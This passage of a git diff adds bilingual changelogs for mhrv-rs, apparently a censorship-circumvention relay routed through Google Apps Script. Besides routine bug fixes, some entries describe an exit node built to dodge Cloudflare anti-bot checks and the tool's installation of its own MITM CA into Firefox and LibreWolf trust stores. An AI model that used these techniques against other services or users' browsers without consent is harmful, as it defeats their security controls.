+• **Fix Full mode timeout cascade — \`batch header read honors request_timeout_secs\`** ([#1088](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1088), [PR #1108](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1108) by @dazzling-no-more). در Full mode، یک Apps Script edge کند، تمام تونل sessionهای hot-and-flowing رو cascade-kill می‌کرد. کاربرها روی v1.9.21+ مرتب 10s "batch timeout" می‌دیدن و download progress تلگرام/browser رو از دست می‌دادن. **Root cause**: \`read_http_response\` در \`domain_fronter.rs\` یک hardcoded 10s header-read timeout داشت که داخل \`tunnel_batch_request_to\` اجرا می‌شد — مستقل از و کوتاه‌تر از outer \`tokio::time::timeout(batch_timeout, ...)\` در \`fire_batch\`. Apps Script cold starts معمولاً 8-12s طول می‌کشن (PR #1040's A/B 4/30 H1 batches رو ثبت کرد که دقیقاً 10s timeout می‌شدن)، پس inner cliff به‌عنوان false-positive batch timeout قبل از اینکه \`request_timeout_secs\` (default 30s) trigger بشه fire می‌شد. **Fix**: (1) \`tunnel_batch_request_to\` حالا \`batch_timeout\` رو به header read pass می‌کنه via new \`read_http_response_with_header_timeout\` helper. (2) Header read یک absolute deadline استفاده می‌کنه (\`timeout_at\`) به جای per-read \`timeout()\` — slow drip-feed peer دیگه نمی‌تونه silently extend بزنه. (3) Bonus: \`TunnelMux::reply_timeout\` با \`batch_timeout\` co-vary می‌کنه (\`batch_timeout + 5s slack\`). ۲۰۹ → **۲۳۱ lib test** (+22 regression).
+• **Docker: cargo-chef برای build بدون BuildKit** ([#620](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/620), [PR #1117](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1117) by @dazzling-no-more). \`tunnel-node/Dockerfile\` از BuildKit-only \`RUN --mount=type=cache\` استفاده می‌کرد که روی Cloud Run's \`gcloud run deploy --source .\` path شکست می‌خورد (underlying \`gcr.io/cloud-builders/docker\` builder BuildKit رو enable نمی‌کنه). cargo-chef pattern: \`recipe.json\` planner stage + \`cargo chef cook\` deps stage + final build with \`src/\` on top. Docker's regular layer cache حالا dependency reuse رو handle می‌کنه — warm rebuilds تنها \`src/\` رو compile می‌کنن. Base bump \`rust:1.85-slim\` → \`rust:1.90-slim\` (cargo-chef نیاز به rustc 1.86+ داره).
+---
+• **Fix Full mode timeout cascade — `batch header read honors request_timeout_secs`** ([#1088](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1088), [PR #1108](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1108) by @dazzling-no-more). Under Full mode, a single slow Apps Script edge cascade-killed every in-flight tunnel session sharing its batch. Users on v1.9.21+ saw frequent 10s "batch timeout" errors and lost download progress on Telegram / browser sessions.
+
+**Root cause**: `read_http_response` in `domain_fronter.rs` had a **hardcoded 10s header-read timeout** that ran *inside* `tunnel_batch_request_to` — independent of and shorter than the outer `tokio::time::timeout(batch_timeout, …)` in `fire_batch`. Apps Script cold starts routinely land in the 8-12s range (PR #1040's A/B recorded 4/30 H1 batches timing out at exactly 10s after the H2→H1 switch), so the inner cliff fired as a false-positive batch timeout well before `request_timeout_secs` (default 30s) could.
+
+**Fix** (in `domain_fronter.rs` + `tunnel_client.rs`):
+
+1. `tunnel_batch_request_to` passes `batch_timeout` to the header read via new `read_http_response_with_header_timeout` helper. `Config::request_timeout_secs` is now the only knob controlling how long we wait for an Apps Script edge to start responding. Other callers (relay path, exit-node) keep the historical 10s value.
+2. Header read uses a single **absolute deadline** (`timeout_at`) instead of per-read `timeout()`. Total elapsed across all header reads is bounded regardless of read cadence — a slow drip-feed peer can no longer silently extend the total wait.
+3. **`TunnelMux::reply_timeout`** co-varies with `batch_timeout` (computed at construction as `fronter.batch_timeout() + 5s slack` instead of fixed 35s const). Operators raising `request_timeout_secs` no longer have sessions abandon `reply_rx` just before `fire_batch`'s HTTP round-trip would complete.
+
+209 → **231 lib tests** (+22 regression covering the deadline/co-variance behavior).
+
+• **Docker: cargo-chef so tunnel-node builds without BuildKit** ([#620](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/620), [PR #1117](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1117) by @dazzling-no-more). `tunnel-node/Dockerfile` used BuildKit-only `RUN --mount=type=cache` directives, breaking on Cloud Run's `gcloud run deploy --source .` path (the underlying `gcr.io/cloud-builders/docker` builder doesn't enable BuildKit, and `--set-build-env-vars DOCKER_BUILDKIT=1` doesn't flip it on either).
+
+Reworked to use **cargo-chef**: a dedicated planner stage emits `recipe.json` for dependency metadata, a `cargo chef cook` stage builds just the deps in their own Docker layer, the final build stage adds `src/` on top. Docker's regular layer cache handles dependency reuse — warm rebuilds where only `src/` changes still skip the slow crate compile.
+
+Base bump `rust:1.85-slim` → `rust:1.90-slim` (cargo-chef's transitive deps require rustc 1.86+; tunnel-node's `Cargo.toml` has no `rust-version` pin so the bump is internal-only).
+
+**Action for Cloud Run users blocked on #620**: pull v1.9.24 of the tunnel-node Docker image (`ghcr.io/therealaleph/mhrv-tunnel-node:v1.9.24` or `:latest`) — your `gcloud run deploy --source .` should now succeed without BuildKit.
+
+**Followup**: issue #1131 (BuffOvrFlw) reports `h1 open timed out after 8s` — that's the `H1_OPEN_TIMEOUT_SECS = 8` from PR #1029 firing on `open()` (TCP+TLS handshake), separate from the header-read timeout this release fixes. Worth a follow-up PR to make `H1_OPEN_TIMEOUT_SECS` parameterized via `request_timeout_secs` too.
diff --git a/docs/changelog/v1.9.25.md b/docs/changelog/v1.9.25.md
new file mode 100644
index 00000000..defdd48a
--- /dev/null
+++ b/docs/changelog/v1.9.25.md
@@ -0,0 +1,63 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+<div dir="rtl">
+
+• **نصب MITM CA در LibreWolf** ([#1145](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1145), [PR #1159](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1159) by @dazzling-no-more). کاربران LibreWolf با خطای `MOZILLA_PKIX_ERROR_MITM_DETECTED` روی سایت‌های HSTS-protected (bing.com، youtube.com، …) مواجه می‌شدن. **علت**: `cert_installer.rs` فقط Firefox profile rootها رو scan می‌کرد. LibreWolf یک Firefox fork است که همون NSS DB layout رو share می‌کنه ولی profile tree خودش رو زیر app dir خودش نگه می‌داره — هیچ‌کدوم از `certutil -A` per-profile install یا `user.js` enterprise-roots auto-trust fallback به LibreWolf نمی‌رسیدن. **راه‌حل**: `firefox_profile_dirs()` → `mozilla_family_profile_dirs()` که هم Firefox هم LibreWolf paths رو per-OS برمی‌گردونه. هیچ تغییری برای کاربران Firefox. ۲۳۱ → **۲۳۹ lib test** (+۸ regression برای LibreWolf path discovery). همان class از bug که قبلاً در #955 و #959 (Firefox-fork) closed شده بود.
+
+• **رفع باگ Full mode «Google و اکثر سایت‌ها خراب، تلگرام سالم» — `udpgw magic IP از داخل virtual-DNS range tun2proxy منتقل شد`** ([#251](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/251) by @dazzling-no-more).
+
+در Full mode روی Android، تلگرام کار می‌کرد ولی Google search و اکثر سایت‌ها silently fail می‌شدن — `apps_script` mode روی همون device سالم بود و VPS هم idle.
+
+**علت**: آدرس magic مربوط به udpgw (یعنی `198.18.0.1:7300`) داخل `198.18.0.0/15` بود، یعنی دقیقاً همون range‌ای که `tun2proxy --dns virtual` ازش IPهای ساختگی رو برای hostname lookupها اختصاص می‌ده. هر دفعه که virtual DNS اتفاقاً `198.18.0.1` رو به یک hostname مثل `www.google.com` allocate می‌کرد، traffic اون host به‌عنوان udpgw connection مصادره می‌شد و drop می‌شد. تلگرام immune بود چون native clientش از IPهای عددی hardcoded استفاده می‌کنه؛ همچنین `apps_script` mode هم immune بود چون اصلاً `--udpgw-server` ست نمی‌کنه.
+
+**راه‌حل**: ثابت `UDPGW_MAGIC_IP` به `192.0.2.1` (RFC 5737 TEST-NET-1) منتقل شد. دو فایل تغییر کرده: یکی `tunnel-node/src/udpgw.rs` (constant + tests) و دیگری `android/.../MhrvVpnService.kt` (که حالا از یک companion const به اسم `UDPGW_MAGIC_DEST` استفاده می‌کنه).
+
+**سازگاری با نسخه‌های قدیمی**: نسخهٔ جدید tunnel-node همچنان `198.18.0.1:7300` قدیمی رو هم accept می‌کنه برای یک deprecation cycle (حذف در v1.10.0) — یعنی اگه VPS رو زودتر آپدیت کنی، Android قدیمی هنوز کار می‌کنه. **ولی اگه Android رو زودتر آپدیت کنی، tunnel-node قدیمی UDP relay رو در Full mode break می‌کنه**. توصیه: اول tunnel-node رو آپدیت کن، بعد APK رو.
+
+</div>
+---
+• **Install MITM CA into LibreWolf NSS stores** ([#1145](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1145), [PR #1159](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1159) by @dazzling-no-more). LibreWolf users were getting `MOZILLA_PKIX_ERROR_MITM_DETECTED` when visiting HSTS-protected sites (bing.com, youtube.com, …) through mhrv-rs's MITM mode. HSTS gives no "Add Exception" affordance, so users were fully locked out despite the OS-level CA install having succeeded.
+
+**Root cause**: `cert_installer.rs` only scanned Firefox profile roots (`~/.mozilla/firefox`, the snap variant, `%APPDATA%\Mozilla\Firefox\Profiles`, `~/Library/Application Support/Firefox/Profiles`). LibreWolf is a Firefox fork that shares Firefox's NSS DB layout and respects the same `security.enterprise_roots.enabled` pref, but stores its profile tree under its own app dir — neither the per-profile `certutil -A` install nor the `user.js` enterprise-roots auto-trust fallback ever touched LibreWolf. Same failure mode as already-closed #955 / #959 (Firefox-fork users).
+
+**Fix**: extend Mozilla-family profile discovery to cover LibreWolf on every supported platform. `firefox_profile_dirs()` → `mozilla_family_profile_dirs()` (returns union of Firefox + LibreWolf paths per-OS). Per-OS coverage:
+- **Linux**: `~/.mozilla/firefox`, snap variant, `~/.librewolf`, `$XDG_CONFIG_HOME/librewolf`.
+- **macOS**: `~/Library/Application Support/Firefox/Profiles`, `~/Library/Application Support/LibreWolf/Profiles`.
+- **Windows**: `%APPDATA%\Mozilla\Firefox\Profiles`, `%APPDATA%\LibreWolf\Profiles`.
+
+No behavioural change for Firefox installs. 231 → **239 lib tests** (+8 regression for LibreWolf path discovery on each OS).
+
+---
+
+• **Fix Full mode "Google + most websites broken while Telegram works" — `udpgw magic IP moved out of tun2proxy virtual-DNS range`** ([#251](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/251) by @dazzling-no-more). Users on Android Full mode reported that Telegram worked fine but Google search and most other websites failed to load — while apps_script mode on the same device + same `google_ip` worked perfectly and the VPS was sitting idle.
+
+**Root cause**: the udpgw magic destination address (`198.18.0.1:7300`) lived inside `198.18.0.0/15` — the exact same range that tun2proxy's `--dns virtual` allocator uses to synthesise fake IPs for hostname lookups. Whenever virtual DNS happened to assign `198.18.0.1` to a real hostname (e.g. `www.google.com`), that hostname's connections were intercepted by tun2proxy *itself* as a udpgw request before they ever reached the SOCKS5 proxy. Result: a random subset of DNS-resolved hosts silently broke per session, depending on which hostname won the `198.18.0.1` allocation. Telegram was unaffected because its native client uses hardcoded numeric IPs (no DNS allocation needed). apps_script mode was unaffected because it doesn't pass `--udpgw-server` to tun2proxy at all.
+
+**Fix**: relocate `UDPGW_MAGIC_IP` from `198.18.0.1` to `192.0.2.1` (RFC 5737 TEST-NET-1). TEST-NET-1 is reserved for documentation, never routed on the public internet, and — critically — outside any virtual-DNS allocation pool. Structurally equivalent to the old address as a "guaranteed-not-real-destination", just no longer colliding with tun2proxy's reserved range.
+
+Coordinated two-side change:
+
+1. **`tunnel-node/src/udpgw.rs`**: `UDPGW_MAGIC_IP = [192, 0, 2, 1]`, doc comment now cites RFC 5737 + explicitly explains why it must stay out of `198.18.0.0/15`. Test additions: `is_udpgw_dest_works` covers both the new IP and the legacy IP (back-compat assertion); new `magic_ip_outside_virtual_dns_range` enforces the invariant at the `198.18.0.0/15` *range* level, so any future move to `198.19.x.y` would also fail the test rather than re-introducing the same class of bug.
+2. **`android/.../MhrvVpnService.kt`**: `--udpgw-server $UDPGW_MAGIC_DEST` where `UDPGW_MAGIC_DEST = "192.0.2.1:7300"` is a new companion-object constant, with a docstring pointing back at the Rust constant — gives the next editor a single, labelled place to update if the convention ever changes again.
+
+**Back-compatibility — partial, one-way**:
+
+The udpgw magic IP is a wire-protocol convention between the Android client and the `mhrv-tunnel` Docker container. v1.9.25 tunnel-nodes accept both the new `192.0.2.1:7300` and the legacy `198.18.0.1:7300` for one deprecation cycle (slated for removal in v1.10.0). That softens — but does *not* fully resolve — the asymmetric-upgrade matrix:
+
+| Android | Tunnel-node | Full-mode UDP relay |
+|---|---|---|
+| v1.9.25 | v1.9.25 | ✅ fully fixed |
+| ≤v1.9.24 | v1.9.25 | ⚠️ udpgw handshake works (legacy IP still recognised by the node), but the **old client still asks tun2proxy for `--udpgw-server 198.18.0.1:7300`** — meaning the underlying #251 virtual-DNS-pool collision is still live on the device. Telegram works; the random Google-search-style breakage persists until the APK is updated. |
+| v1.9.25 | ≤v1.9.24 | ❌ **breaks silently** — new client sends `192.0.2.1`, old node treats it as a real TCP destination and the connect fails |
+| ≤v1.9.24 | ≤v1.9.24 | unchanged from before (still has the original #251 bug) |
+
+**Recommended upgrade order**: update **both halves** to v1.9.25. The fix is on the *client* side (which magic IP it asks tun2proxy to reserve) — the tunnel-node back-compat shim only prevents a hard handshake break during the window where the node is upgraded first; it does not fix the original bug. If you can only update one half right now: do the **APK first** (or both together), since updating just the tunnel-node leaves clients still hitting the virtual-DNS collision. Be aware of the trade-off shown in the table above, though: a v1.9.25 APK talking to a ≤v1.9.24 tunnel-node silently breaks Full-mode UDP relay until the node is upgraded too, so keep that window as short as possible. `apps_script`-only users are unaffected (the udpgw path isn't used in apps_script mode).
+
+**Diagnostic note for stuck users**: if Telegram works on Full mode but Google search / random websites silently fail on v1.9.24 or earlier, this is your bug. As a workaround pending upgrade, add Google domains to `passthrough_hosts` to route them through tunnel-node like Telegram does:
+
+```json
+{
+  "passthrough_hosts": [".google.com", ".gstatic.com", ".googleusercontent.com", ".googleapis.com", ".youtube.com", ".ytimg.com"]
+}
+```
+
+Slower per-request (Apps Script overhead) but bypasses the virtual-DNS clash entirely. Remove once both halves are on v1.9.25.
diff --git a/docs/changelog/v1.9.3.md b/docs/changelog/v1.9.3.md
new file mode 100644
index 00000000..7256d57d
--- /dev/null
+++ b/docs/changelog/v1.9.3.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• toggle `youtube_via_relay` در Android Advanced settings (PR [#535](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/535) از @yyoyoian-pixel، closes [#520](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/520)): تا قبل، desktop UI checkbox `youtube_via_relay` داشت ولی Android UI نه — کاربران Android مجبور بودن config.json رو دستی edit کنن (که بدون root کارش نشدنی بود). حالا Switch toggle در بخش Advanced settings در Android UI هست + match با desktop UI checkbox. شامل field `youtubeViaRelay` در `MhrvConfig` با JSON serialization (`youtube_via_relay` به‌عنوان wire format)، deserialization، + encode برای config-sharing. resources رشته EN + FA برای label + helper text. تغییر pure Android/Kotlin؛ بدون Rust impact.
+• fix CI: `gh release download` در workflow Telegram publish با `--clobber` کار می‌کنه تا retries بعد از partial download کار کنه (no user impact، ولی v1.9.2 release برای Telegram channel به‌خاطر این bug fail شد + manual re-publish لازم شد).
+---
+• `youtube_via_relay` toggle in Android Advanced settings (PR [#535](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/535) by @yyoyoian-pixel, closes [#520](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/520)): the desktop UI has had a `youtube_via_relay` checkbox for a while, but the Android UI was missing it — Android users had to hand-edit `config.json` (which requires root on Android). Now there's a Switch toggle in the Advanced settings section matching the desktop UI checkbox. Adds `youtubeViaRelay` field to `MhrvConfig` with JSON serialization (`youtube_via_relay` as the wire-format key), deserialization, and config-sharing encode. EN + FA string resources for label and helper text. Pure Android/Kotlin change; no Rust impact.
+• CI fix: `gh release download` in the Telegram publish workflow now uses `--clobber` so retries can survive partial downloads (no user impact, but the v1.9.2 release's Telegram channel publish failed because of this and required a manual re-trigger).
diff --git a/docs/changelog/v1.9.4.md b/docs/changelog/v1.9.4.md
new file mode 100644
index 00000000..d7465015
--- /dev/null
+++ b/docs/changelog/v1.9.4.md
@@ -0,0 +1,26 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• exit node اختیاری برای دور زدن CF anti-bot روی ChatGPT / Claude / Grok / X (port از upstream [`masterking32/MasterHttpRelayVPN@464a6e1d`](https://github.com/masterking32/MasterHttpRelayVPN/commit/464a6e1d), با hardening): سایت‌های پشت Cloudflare مانند `chatgpt.com`، `claude.ai`، `grok.com`، `x.com`، `openai.com` traffic از Google datacenter IPs (Apps Script's outbound IP space) رو به‌عنوان bot flag می‌کنن + Turnstile / CAPTCHA / 502 challenge برمی‌گردونن. تا v1.9.3 این "Relay error: json: key must be a string at line 2 column 1" یا 502 generic می‌داد + هیچ workaround در apps_script mode نبود. حالا یک endpoint TypeScript کوچک (`assets/exit_node/exit_node.ts`) روی Deno Deploy / fly.io deploy می‌شه + بین Apps Script + destination قرار می‌گیره. مسیر traffic: `client → SNI rewrite → Apps Script (Google IP) → the exit node (non-Google IP) → destination`. destination IP exit node رو می‌بینه، نه Google datacenter — heuristic anti-bot CF نمی‌سوزه + صفحه واقعی برمی‌گرده. **leg user-side (Iran ISP → Apps Script) بدون تغییر** — second hop کاملاً درون outbound Apps Script اجرا می‌شه، invisible از شبکه‌ی کاربر. config جدید:
+```json
+"exit_node": {
+  "enabled": true,
+  "relay_url": "https://your-deployed-exit-node.example.com",
+  "psk": "<openssl rand -hex 32>",
+  "mode": "selective",
+  "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+}
+```
+دو mode: `selective` (default — فقط hosts مشخص از طریق exit node می‌رن) و `full` (همه می‌رن). در صورت failure exit node fallback اتومات به Apps Script direct (سایت‌های CF affected fail می‌گیرن، بقیه کار می‌کنن). hardening over upstream: PSK fail-closed اگر همچنان placeholder باشه (در fresh deploy نمی‌تونه به‌عنوان open relay accidentally سرو بشه)، loop guard (refuse fetch host خود)، 503 explicit برای misconfigured deploys. setup walkthrough در [`assets/exit_node/README.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.fa.md). config مثال در [`config.exit-node.example.json`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/config.exit-node.example.json).
+• حذف legacy `telegram` job در `release.yml` — قبلاً وقتی `TELEGRAM_NOTIFY_ENABLED` repo variable روی `true` set بود (در حال حاضر بود)، هر release **دو پست duplicate APK روی main channel** ایجاد می‌کرد: یکی قدیمی (universal APK + changelog) از release.yml و یکی جدید (cross-link به files channel) از telegram-publish-files.yml. فقط cross-link جدید رو می‌خواستیم. legacy job + helper script `.github/scripts/telegram_release_notify.py` حذف شدن. `telegram-publish-files.yml` (per-platform per-file posts با SHA-256 captions) تنها مسیر باقی مونده.
+---
+• Optional exit node to bypass CF anti-bot on ChatGPT / Claude / Grok / X (ported from upstream [`masterking32/MasterHttpRelayVPN@464a6e1d`](https://github.com/masterking32/MasterHttpRelayVPN/commit/464a6e1d), with hardening): Cloudflare-fronted services like `chatgpt.com`, `claude.ai`, `grok.com`, `x.com`, `openai.com` flag traffic from Google datacenter IPs (Apps Script's outbound IP space) as bots and return Turnstile / CAPTCHA / 502 challenges. Through v1.9.3 this surfaced as "Relay error: json: key must be a string at line 2 column 1" or generic 502 with no apps_script-mode workaround. Now a small TypeScript HTTP endpoint (`assets/exit_node/exit_node.ts`) deployed on Deno Deploy / fly.io sits between Apps Script and the destination. Traffic chain: `client → SNI rewrite → Apps Script (Google IP) → the exit node (non-Google IP) → destination`. The destination sees the exit node's IP, not Google datacenter — CF's anti-bot heuristic doesn't fire and the real page comes back. **The user-side leg (Iran ISP → Apps Script) is unchanged** — the second hop happens entirely inside Apps Script's outbound, invisible from the user's network, so the DPI evasion property mhrv-rs is built around stays intact. New config:
+```json
+"exit_node": {
+  "enabled": true,
+  "relay_url": "https://your-deployed-exit-node.example.com",
+  "psk": "<openssl rand -hex 32>",
+  "mode": "selective",
+  "hosts": ["chatgpt.com", "claude.ai", "x.com", "grok.com", "openai.com"]
+}
+```
+Two modes: `selective` (default, only listed hosts route via exit node, recommended) or `full` (everything via exit node, slower). On exit-node failure, mhrv-rs falls back to direct Apps Script automatically — CF-affected sites fail in that case but everything else keeps working, so a down exit node doesn't take you fully offline. Hardening over upstream: PSK fail-closed if still the placeholder (fresh exit-node deploy can't accidentally serve as open relay until the user replaces the placeholder), loop guard (refuses to `fetch` its own host), explicit 503 on misconfigured deploys. Setup walkthrough in [`assets/exit_node/README.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.md) (English) and [`README.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/README.fa.md) (Persian). Complete example config at [`config.exit-node.example.json`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/config.exit-node.example.json).
+• Removed the legacy `telegram` job from `release.yml`. Previously, with the `TELEGRAM_NOTIFY_ENABLED` repo variable flipped to `true` (which it had been), every release produced **two duplicate APK posts on the main Telegram channel**: the old `release.yml` job (universal APK + bundled changelog) and the newer `telegram-publish-files.yml` workflow (per-platform per-file posts to the files channel + a single cross-link to the main channel). Only the cross-link was wanted. The legacy job and its helper script `.github/scripts/telegram_release_notify.py` are gone. `telegram-publish-files.yml` is now the only Telegram path. The legacy bundled-on-main pattern is recoverable from `git log` if anyone ever wants it back.
diff --git a/docs/changelog/v1.9.5.md b/docs/changelog/v1.9.5.md
new file mode 100644
index 00000000..2e77c597
--- /dev/null
+++ b/docs/changelog/v1.9.5.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• fix exit-node v1.9.4: مدارا با TLS ungraceful close (peer closed without close_notify) از سمت host exit-node ([#585](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/585) از @gregtheph): در v1.9.4، کاربری که exit node رو با درست‌ترین config setup کرد، در log می‌دید `WARN exit node failed for https://chatgpt.com/: io: peer closed connection without sending TLS close_notify — falling back to direct Apps Script` + سپس fallback به Apps Script که خود نمی‌تونه ChatGPT رو reach کنه، در نتیجه decoy/no-json error. علت: rustls سختگیر است درباره‌ی TLS shutdown — وقتی peer (the exit node) underlying TCP رو می‌بنده بدون اول send کردن TLS close_notify alert، rustls `io::ErrorKind::UnexpectedEof` می‌فرسته. کد ما در `read_http_response` این error رو propagate می‌کرد به‌عنوان hard error. حالا UnexpectedEof به‌صورت graceful EOF (مشابه `n == 0`) درمان می‌شه — اگر body completed شده با Content-Length، response درست برمی‌گرده. اگر mid-body close بود، error real (truncation) همچنان propagate می‌شه. ۴ regression test جدید (شامل UnexpectedEof tolerance + envelope unwrap exit_node). 173 lib tests + 33 tunnel-node tests pass.
+---
+• Fix v1.9.4 exit-node: tolerate ungraceful TLS close (peer closed without close_notify) on the exit-node path ([#585](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/585) by @gregtheph): in v1.9.4, users with a correctly-configured exit-node deployment saw `WARN exit node failed for https://chatgpt.com/: io: peer closed connection without sending TLS close_notify — falling back to direct Apps Script` in the log, followed by a fallback to direct Apps Script which can't reach ChatGPT either, resulting in the decoy/no-json error. Root cause: rustls is strict about TLS shutdown — when the peer (the exit-node's host) closes the underlying TCP without first sending a TLS close_notify alert, rustls surfaces this as `io::ErrorKind::UnexpectedEof`. Our code in `read_http_response` was propagating this as a hard error rather than treating it as graceful EOF. Now `UnexpectedEof` is handled like `n == 0`: if the body has been fully received per Content-Length, the response returns successfully; if it's a real mid-body truncation, the error still propagates as `BadResponse`. Same handling added to the chunked reader and the no-framing reader. Four regression tests cover the new behavior (UnexpectedEof tolerance for Content-Length and no-framing branches + exit-node envelope unwrap success and error paths). 173 lib tests + 33 tunnel-node tests passing.
diff --git a/docs/changelog/v1.9.6.md b/docs/changelog/v1.9.6.md
new file mode 100644
index 00000000..9cf6360b
--- /dev/null
+++ b/docs/changelog/v1.9.6.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Code.gs / CodeFull.gs hardening + باگ‌فیکس (هیچ تغییری در کانفیگ کاربر لازم نیست — فقط Code.gs خودتان را با [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (یا `CodeFull.gs` برای حالت full) جایگزین کنید + در Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Deployment ID همان قبلی می‌ماند):
+  - **`Code.gs` doGet تکراری حذف شد**: نسخه‌ای که با `HtmlService.createHtmlOutput` تعریف شده بود به‌خاطر hoisting جاوااسکریپت روی نسخهٔ صحیح `ContentService` overwrite می‌کرد. در نتیجه هر GET به URL deployment پاسخ سندباکس `goog.script.init` iframe برمی‌گرداند به‌جای HTML پلیس‌هولدر ساده. این برای ترافیک معمولی POST تأثیری نداشت ولی در زنجیرهٔ redirect که با GET پی می‌گیریم می‌توانست باگ ظاهر شود.
+  - **`CodeFull.gs` `doGet` به `ContentService` تغییر کرد** (قبلاً `HtmlService` بود) — به همان دلیل بالا.
+  - **هدرهای IP-leak در `SKIP_HEADERS` اضافه شد** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — در صورت misconfigured بودن یک پروکسی upstream سمت کاربر، IP واقعی کاربر دیگر در leg دوم سرور به مقصد نشت نمی‌کند. لایهٔ دفاع دوم به stripping سمت کلاینت v1.2.9 (#104).
+  - **`_doBatch` دارای fallback شد**: اگر `UrlFetchApp.fetchAll()` به‌عنوان یک کل throw کند (مثلاً یک URL بد همه را poison کند)، حالا برای متدهای امن (GET / HEAD / OPTIONS) per-item fetch می‌کند به‌جای صفر کردن کل پاسخ batch. port از `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (سمت Rust): unwrapper برای `goog.script.init("...userHtml...")` اضافه شد — اگر هر deployment‌ای پاسخ HtmlService-wrapped برگرداند (legacy Code.gs قبل از v1.9.6، یا redirect که doGet را GET بزند)، client حالا JSON داخلی را استخراج می‌کند به‌جای `key must be a string at line 2 column 1` fail کردن. در مقابل پاسخ doGet واقعی deployment کاربر تست شده — UTF-8 با `\xNN` byte-escape را درست decode می‌کند.
+• README بازنویسی شد: نسخهٔ کوتاه دوزبانه (انگلیسی + فارسی RTL) برای کاربر معمولی + راهنمای کامل پیشرفته در [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) و [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). جدا کردن "راه‌اندازی ۵ دقیقه‌ای" از "همهٔ گزینه‌ها و troubleshooting" راهنما را خیلی قابل‌فهم‌تر کرد، خصوصاً برای کاربرانی که می‌خواهند فقط شروع کنند.
+• تست: ۳ regression test جدید برای `extract_apps_script_user_html` + `decode_js_string_escapes` + `parse_relay_json` end-to-end. **۱۷۶ lib test + ۳۳ tunnel-node test همه pass.**
+---
+• Code.gs / CodeFull.gs hardening + bug fixes (no client config change needed — just replace your own Code.gs with [`assets/apps_script/Code.gs`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/apps_script/Code.gs) (or `CodeFull.gs` for full mode) and in the Apps Script editor: `Manage deployments → ✏️ → Version: New version → Deploy`. Your Deployment ID stays the same):
+  - **Removed duplicate `doGet` in `Code.gs`**: a second copy declared with `HtmlService.createHtmlOutput` was silently overriding the correct `ContentService` one due to JS function hoisting. Result: every GET to the deployment URL was returning the `goog.script.init` sandbox iframe instead of the simple placeholder HTML. Did not affect normal POST traffic, but could surface during redirect chains we GET-follow.
+  - **`CodeFull.gs` `doGet` switched to `ContentService`** (was `HtmlService`) — same reason as above.
+  - **Added IP-leak headers to `SKIP_HEADERS`** (`X-Forwarded-For`, `X-Forwarded-Host`, `X-Forwarded-Proto`, `X-Forwarded-Port`, `X-Real-IP`, `Forwarded`, `Via`) — if a misconfigured upstream proxy on the user side adds these, the user's real IP no longer leaks to the destination on the server-side leg. Second line of defense to v1.2.9's client-side stripping (#104).
+  - **`_doBatch` got a fallback path**: if `UrlFetchApp.fetchAll()` throws as a whole (e.g. one bad URL poisons the batch), it now per-item-fetches safe methods (GET / HEAD / OPTIONS) instead of zeroing the entire batch's responses. Ported from `masterking32/MasterHttpRelayVPN@3094288`.
+• `parse_relay_json` (Rust client): added unwrapper for `goog.script.init("...userHtml...")` iframe — if any deployment ever returns an HtmlService-wrapped response (legacy Code.gs prior to v1.9.6, or a redirect that GET-hits doGet), the client now extracts the inner JSON instead of failing with `key must be a string at line 2 column 1`. Tested against a real user deployment's actual doGet output — correctly decodes UTF-8 with `\xNN` byte-escapes.
+• Rewrote the README: short bilingual landing page (English + Persian RTL) for normal users, with the full advanced reference moved to [`docs/guide.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.md) and [`docs/guide.fa.md`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/docs/guide.fa.md). Splitting "5-minute quick start" from "every option + troubleshooting" makes the docs much more approachable, especially for users who just want to get running.
